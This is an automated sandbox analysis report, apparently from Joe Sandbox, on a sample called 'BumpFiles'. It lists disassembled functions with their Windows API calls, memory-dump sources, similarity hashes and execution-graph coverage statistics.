                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3855596055.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856957335.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856999369.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857029518.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857067852.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857104267.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857141551.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorFileLast$AttributesDeleteDirectoryRemove
                                                                    • String ID:
                                                                    • API String ID: 2814369299-0
                                                                    • Opcode ID: 18afb03090a0d0029a8166759789f8574f40b467fd75361f09ab48c2f9fad2e0
                                                                    • Instruction ID: ced7317d0bb7603919c6f65922b20b3b5ec63e78df0876d40d037117c1771166
                                                                    • Opcode Fuzzy Hash: 18afb03090a0d0029a8166759789f8574f40b467fd75361f09ab48c2f9fad2e0
                                                                    • Instruction Fuzzy Hash: 44F08261301B2019A91035BE28C1BBF51488DC276FB94073BF944D2292D92D4C86419E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 005EBBE8 Relevance: 7.5, APIs: 5, Instructions: 39threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • UnhookWindowsHookEx.USER32(00000000), ref: 005EBBFA
                                                                    • SetEvent.KERNEL32(00000000), ref: 005EBC26
                                                                    • GetCurrentThreadId.KERNEL32 ref: 005EBC2B
                                                                    • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 005EBC54
                                                                    • CloseHandle.KERNEL32(00000000,00000000), ref: 005EBC61
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3855596055.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856957335.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856999369.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857029518.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857067852.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857104267.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857141551.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: CloseCurrentEventHandleHookMultipleObjectsThreadUnhookWaitWindows
                                                                    • String ID:
                                                                    • API String ID: 2132507429-0
                                                                    • Opcode ID: eb5dd2f89c71f090cece70a2ea0db19f723eae7c739ab1a321d30a1f943af5bf
                                                                    • Instruction ID: 3a001b7b59bab94448f4574198c486d7b1ad41d0dfc1326082cf4b057d3abe7e
                                                                    • Opcode Fuzzy Hash: eb5dd2f89c71f090cece70a2ea0db19f723eae7c739ab1a321d30a1f943af5bf
                                                                    • Instruction Fuzzy Hash: 5D012BB0108B02DFE728EB66CC49B5A3BE5BF80316F508519B0A5CB1E0DB349880C765
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00409ABC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00409AFA
                                                                    • FreeLibrary.KERNEL32(?,?,?,00651B9C,00651B9C,?,?,00646C38,00410843,00645860), ref: 00409B98
                                                                    • ExitProcess.KERNEL32(00000000,?,?,00651B9C,00651B9C,?,?,00646C38,00410843,00645860), ref: 00409BD1
                                                                      • Part of subcall function 00409A2C: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,`Xd,00000000,?,00409AEA,?,?,00651B9C,00651B9C,?,?,00646C38,00410843,00645860), ref: 00409A65
                                                                      • Part of subcall function 00409A2C: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,`Xd,00000000,?,00409AEA,?,?,00651B9C,00651B9C,?,?,00646C38,00410843), ref: 00409A6B
                                                                      • Part of subcall function 00409A2C: GetStdHandle.KERNEL32(000000F5,00000000,00000002,`Xd,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,`Xd,00000000,?,00409AEA,?,?,00651B9C), ref: 00409A86
                                                                      • Part of subcall function 00409A2C: WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,`Xd,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,`Xd,00000000,?,00409AEA,?,?), ref: 00409A8C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3855596055.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856957335.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856999369.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857029518.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857067852.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857104267.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857141551.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                                    • String ID: t5B
                                                                    • API String ID: 3490077880-2522545044
                                                                    • Opcode ID: dee015889ac32e6df2b25993643341ab4869c9cb8df1deab5bfee0089377f4bb
                                                                    • Instruction ID: 3e064d22227ce83d323fd635ef74908ee7d5fe006525e65d3825cc916af52ec8
                                                                    • Opcode Fuzzy Hash: dee015889ac32e6df2b25993643341ab4869c9cb8df1deab5bfee0089377f4bb
                                                                    • Instruction Fuzzy Hash: A7314C34A007419BDB31AB7AA88471B7BE1BB46324F14493FE485A62D3D77CEC84CB19
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040CBB8 Relevance: 6.1, APIs: 4, Instructions: 95threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetThreadUILanguage.KERNEL32(?,00000000), ref: 0040CBC9
                                                                    • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 0040CC27
                                                                    • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 0040CC84
                                                                    • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 0040CCB7
                                                                      • Part of subcall function 0040CB74: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,0040CC35), ref: 0040CB8B
                                                                      • Part of subcall function 0040CB74: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,0040CC35), ref: 0040CBA8
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3855596055.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856957335.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856999369.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857029518.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857067852.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857104267.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857141551.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: Thread$LanguagesPreferred$Language
                                                                    • String ID:
                                                                    • API String ID: 2255706666-0
                                                                    • Opcode ID: 72f7c58ec07244d9a8b6590b8c99882c83141c37e6ee73b2fa0aef0b244a9c62
                                                                    • Instruction ID: 41e4a82156dcdbea47aa592af73f03f4b3f6d906c0d9ea18ea200e93a0dd79e9
                                                                    • Opcode Fuzzy Hash: 72f7c58ec07244d9a8b6590b8c99882c83141c37e6ee73b2fa0aef0b244a9c62
                                                                    • Instruction Fuzzy Hash: 0A316D70E0421ADBDB10DBA9C8C5AAEB3B5EF05305F10427AE519EB291DB789A04CB54
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 005EC9E8 Relevance: 6.1, APIs: 4, Instructions: 85threadwindowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetWindow.USER32(?,00000004), ref: 005EC9FA
                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 005ECA17
                                                                    • GetCurrentProcessId.KERNEL32(?,00000004), ref: 005ECA23
                                                                    • IsWindowVisible.USER32(?), ref: 005ECA7D
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3855596055.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856957335.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856999369.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857029518.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857067852.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857104267.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857141551.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Process$CurrentThreadVisible
                                                                    • String ID:
                                                                    • API String ID: 3926708836-0
                                                                    • Opcode ID: ae48674ec502b5c25bc1aae18e8a90669d7f96e4dd4d16030504c316246d3a25
                                                                    • Instruction ID: 8268e75e0adbed2169e79767f9ce143fa46dc78cab4c363f5557c18a9004b086
                                                                    • Opcode Fuzzy Hash: ae48674ec502b5c25bc1aae18e8a90669d7f96e4dd4d16030504c316246d3a25
                                                                    • Instruction Fuzzy Hash: 9A31BC71600B49DFDB20DFAAD8C5BAA7BA5BB48304F9441B6E815D7352EB30FD418B90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 005ED634 Relevance: 6.1, APIs: 4, Instructions: 85COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetActiveWindow.USER32(?,?,006551D0,005EE2DC), ref: 005ED662
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3855596055.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856957335.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856999369.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857029518.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857067852.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857104267.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857141551.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: ActiveWindow
                                                                    • String ID:
                                                                    • API String ID: 2558294473-0
                                                                    • Opcode ID: fb2bbe578685c1848e64e5aef4fcec5335ddfaafe7add0855c05a9fda4d45933
                                                                    • Instruction ID: 316ea7ef422e3561d401b094dd8cef2e267661bcd36d655bf6b1583c726e49ee
                                                                    • Opcode Fuzzy Hash: fb2bbe578685c1848e64e5aef4fcec5335ddfaafe7add0855c05a9fda4d45933
                                                                    • Instruction Fuzzy Hash: 9C310D706042C19BDB18FF2AC8C9B9A3BA6BF44304F1440B5BD849F29BCA74DC85C761
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 005EC798 Relevance: 6.1, APIs: 4, Instructions: 56COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • EnumWindows.USER32(005EC6D4), ref: 005EC7C5
                                                                    • GetWindow.USER32(00000003,00000003), ref: 005EC7DD
                                                                    • GetWindowLongW.USER32(00000000,000000EC), ref: 005EC7EA
                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000213,00000000,000000EC), ref: 005EC829
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3855596055.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856957335.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856999369.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857029518.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857067852.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857104267.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857141551.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: Window$EnumLongWindows
                                                                    • String ID:
                                                                    • API String ID: 4191631535-0
                                                                    • Opcode ID: c52ffe457daee2d391e7c8c1ae88a74a5a0506567ac3227abf4ff07a4df4949a
                                                                    • Instruction ID: 6cfa09aa32f089a1f13344452882ebc562bbad27a0c324552ed6f96263435584
                                                                    • Opcode Fuzzy Hash: c52ffe457daee2d391e7c8c1ae88a74a5a0506567ac3227abf4ff07a4df4949a
                                                                    • Instruction Fuzzy Hash: 6811A030608750AFDB10AA1E8885FDA7A94AB46724F184168FCD8AB1D2C7709C82CB62
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00532154 Relevance: 6.0, APIs: 4, Instructions: 35threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 00532161
                                                                    • GetCurrentProcessId.KERNEL32(?,?,00000000,005EFD71,?,?,?,00000001,005EDF4B), ref: 0053216A
                                                                    • GlobalFindAtomW.KERNEL32(00000000), ref: 0053217F
                                                                    • GetPropW.USER32(00000000,00000000), ref: 00532196
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3855596055.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856957335.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856999369.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857029518.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857067852.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857104267.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857141551.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
                                                                    • String ID:
                                                                    • API String ID: 2582817389-0
                                                                    • Opcode ID: 536c3aff569af4baeae921204661b15b761a0ff35ef730b8b780b24beb53bddb
                                                                    • Instruction ID: c7d3ec914ef7cc7fd85d71469748cdc3bb9cf033b4ebf6ec3ea160049ca614c5
                                                                    • Opcode Fuzzy Hash: 536c3aff569af4baeae921204661b15b761a0ff35ef730b8b780b24beb53bddb
                                                                    • Instruction Fuzzy Hash: 83F06C72300B12A6DB20B7F67DC58AB278C9D947A5F411936FA41D7141D55CCC41C3F5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004091A6 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 124COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • UnhandledExceptionFilter.KERNEL32(?,00000000), ref: 0040927A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3855596055.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856957335.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856999369.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857029518.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857067852.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857104267.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857141551.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled
                                                                    • String ID: 8Q@
                                                                    • API String ID: 3192549508-4538559
                                                                    • Opcode ID: 0ee4e09c54aa6e425cbc97756c8e7cad0d7145fca06ddd3aa2fd3d8f3229600e
                                                                    • Instruction ID: 5c24eb5a0224f0d0217dee170c32e69bb12a0157d27a806c2dea3ea9b843178a
                                                                    • Opcode Fuzzy Hash: 0ee4e09c54aa6e425cbc97756c8e7cad0d7145fca06ddd3aa2fd3d8f3229600e
                                                                    • Instruction Fuzzy Hash: 5A41BF74204201AFD720DF14D884B6BB7E6EB89314F5449BEE844AB392C738EC81CB69
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040907A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • UnhandledExceptionFilter.KERNEL32(00000006,00000000), ref: 004090E6
                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,Function_0000907C), ref: 00409123
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3855596055.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856957335.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856999369.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857029518.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857067852.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857104267.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857141551.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled
                                                                    • String ID: 8Q@
                                                                    • API String ID: 3192549508-4538559
                                                                    • Opcode ID: d8bc75a49be3868f3870258a1c84696a1119bf996198daecdf9d3cda867161b8
                                                                    • Instruction ID: 3f5640ce620659ae70755be411fdbb9ab37924059e896462e0bf5bb31e75aaa3
                                                                    • Opcode Fuzzy Hash: d8bc75a49be3868f3870258a1c84696a1119bf996198daecdf9d3cda867161b8
                                                                    • Instruction Fuzzy Hash: D0316174704201AFF320DB24C988F27B7E6EB89714F55856EF5449B392C779EC80CA69
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00431BFC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetACP.KERNEL32(00422164,00000001), ref: 00431C18
                                                                    • GetCPInfo.KERNEL32(00431CFC,?,00422164,00000001), ref: 00431C39
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3855596055.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856957335.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856999369.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857029518.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857067852.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857104267.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857141551.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: Info
                                                                    • String ID: dB
                                                                    • API String ID: 1807457897-4186906907
                                                                    • Opcode ID: 65a2383da8e2ee5cccfb8637ae2fbe26abb7a3fb1eedf3c9967e081fedec5aae
                                                                    • Instruction ID: e5a0a06e1b2316e04b0ed604c2c2d8d31d3c5bbf7ca71c3f0e9c3581ed2bfd2c
                                                                    • Opcode Fuzzy Hash: 65a2383da8e2ee5cccfb8637ae2fbe26abb7a3fb1eedf3c9967e081fedec5aae
                                                                    • Instruction Fuzzy Hash: 460149716417048FC720EF6AE941997B7E8AF08354B00993FFC95C7351EB39E8008BA9
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00429308 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FormatMessageW.KERNEL32(00003300,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,j$L,?,004C2803,D*L,00000004,004C0A6C,00000000), ref: 0042932C
                                                                    • LocalFree.KERNEL32(00000001,00429385,00003300,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,j$L,?,004C2803,D*L,00000004), ref: 00429378
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3855596055.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856957335.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3856999369.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857029518.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857067852.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857104267.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857141551.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000004.00000002.3857178702.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: FormatFreeLocalMessage
                                                                    • String ID: j$L
                                                                    • API String ID: 1427518018-881032185
                                                                    • Opcode ID: 4368be9f9cc55daf07c8490309becffcaf4b20e1df3bbf12405840c18cc40611
                                                                    • Instruction ID: a4427651f3d97b25f843a57d3278f1a4ed8704c5c77d1cef0145a63058bfea89
                                                                    • Opcode Fuzzy Hash: 4368be9f9cc55daf07c8490309becffcaf4b20e1df3bbf12405840c18cc40611
                                                                    • Instruction Fuzzy Hash: ED012630744214AEE728D695AC12FBF369EE7CCB00FE0406BB900D62C0DA7C9D108268
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Execution Graph

                                                                    Execution Coverage:12.7%
                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                    Signature Coverage:0%
                                                                    Total number of Nodes:1517
                                                                    Total number of Limit Nodes:27
